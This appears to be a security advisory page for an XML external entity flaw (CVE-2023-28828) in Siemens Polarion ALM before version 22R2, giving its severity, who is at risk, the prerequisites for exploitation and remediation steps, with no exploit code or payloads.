External Entity Injection Vulnerability in Polarion ALM

Monitor5.9SSA-632164Apr 11, 2023

Attack VectorNetwork

Auth RequiredNone

ComplexityHigh

User InteractionNone needed

Summary

Polarion ALM is vulnerable to XML External Entity (XXE) injection that could allow an attacker to disclose confidential data. The vulnerability affects versions prior to 22R2.

What this means

What could happen

An attacker could read sensitive files and data from the Polarion ALM server, including configuration data, credentials, or project information stored on the system.

Who's at risk

Engineering and product development teams using Polarion ALM for application lifecycle management and requirements tracking. The vulnerability primarily affects organizations that expose the Polarion ALM interface to networked access. This includes teams managing safety-critical or secure system designs where confidentiality of project data is important.

How it could be exploited

An attacker sends a crafted XML document with external entity references to Polarion ALM. If the application parses this XML without proper restrictions, the attacker can extract sensitive files from the server's filesystem or internal network resources.

Prerequisites

Network access to Polarion ALM application (typically port 80/443)
Polarion ALM version prior to 22R2
The application must accept and process XML input from an external source

remotely exploitableno authentication requiredaffects sensitive data disclosurelow to medium exploitation complexity

Exploitability

Low exploit probability (EPSS 0.2%)

Affected products (1)

ProductAffected VersionsFix Status

Polarion ALM< V22R222R2

Remediation & Mitigation

0/4

Do now

0/2

HARDENINGRestrict network access to Polarion ALM to authorized users and systems only; implement firewall rules to limit exposure to engineering workstations and build systems

WORKAROUNDDisable or restrict XML external entity processing in Polarion ALM if available through configuration settings

Schedule — requires maintenance window

0/1

Patching may require device reboot — plan for process interruption

HOTFIXUpdate Polarion ALM to version 22R2 or later

Long-term hardening

0/1

HARDENINGImplement input validation and content security policies to prevent malicious XML from being processed

CVEs (1)

CVE-2023-28828

View full Siemens ProductCERT advisory

↑↓ Navigate · Esc Close

API: /api/v1/advisories/a16248da-f98a-4985-a88a-3a47d00a62f8